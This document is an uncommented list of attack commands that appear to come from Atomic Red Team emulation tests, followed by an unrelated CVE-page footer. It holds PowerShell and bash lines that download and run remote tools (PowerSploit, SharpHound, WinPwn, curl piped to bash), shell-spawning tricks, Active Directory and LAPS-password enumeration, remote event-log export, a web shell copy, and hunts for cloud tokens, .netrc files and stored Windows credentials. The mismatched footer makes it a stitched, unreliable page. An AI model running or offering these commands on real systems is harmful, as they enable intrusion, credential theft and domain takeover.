[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
Invoke-AllChecks
powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
import-module "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
try { Invoke-BloodHound -OutputDirectory $env:Temp }
catch { $_; exit $_.Exception.HResult}
Start-Sleep 5
write-host "Remote download of SharpHound.ps1 into memory, followed by execution of the script" -ForegroundColor Cyan
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5
#{soaphound_path} --user $(#{user})@$(#{domain}) --password #{password} --dc #{dc} --buildcache --cachefilename #{cachefilename}
#{soaphound_path} --user #{user} --password #{password} --domain #{domain} --dc #{dc} --bhdump --cachefilename #{cachefilename} --outputdirectory #{outputdirectory}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
ldapdomaindump -u #{username} -p #{password} #{target_ip} -o /tmp/T1087
ldapsearch -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{user} -w #{password} -b "CN=Users,DC=#{domain},DC=#{top_level_domain}" -s sub -a always -z 1000 dn
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc admincountdmp #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc exchaddresses #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=person) #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties
Invoke-Expression "#{adrecon_path}"
([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne()
Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}
net user administrator /domain
(([adsisearcher]'(objectcategory=organizationalunit)').FindAll()).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] OU Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
(([adsisearcher]'').SearchRooT).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] Domain Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
net user /domain
net group /domain
net user /domain
get-localgroupmember -group Users
get-aduser -filter *
query user /SERVER:#{computer_name}
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose
cd "PathToAtomicsFolder\..\ExternalPayloads"
.\kerbrute.exe userenum -d #{Domain} --dc #{DomainController} "PathToAtomicsFolder\..\ExternalPayloads\username.txt"
Get-ADComputer #{hostname} -Properties *
Get-adcomputer -SearchScope subtree -filter "name -like '*'" -Properties *
Get-ADComputer #{hostname} -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" *
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$target = $env:LOGONSERVER
$target = $target.Trim("\\")
$IpAddress = [System.Net.Dns]::GetHostAddresses($target) | select IPAddressToString -ExpandProperty IPAddressToString
wmic.exe /node:$IpAddress process call create 'wevtutil epl Security C:\\ntlmusers.evtx /q:\"Event[System[(EventID=4776)]]"'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
generaldomaininfo -noninteractive -consoleoutput
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.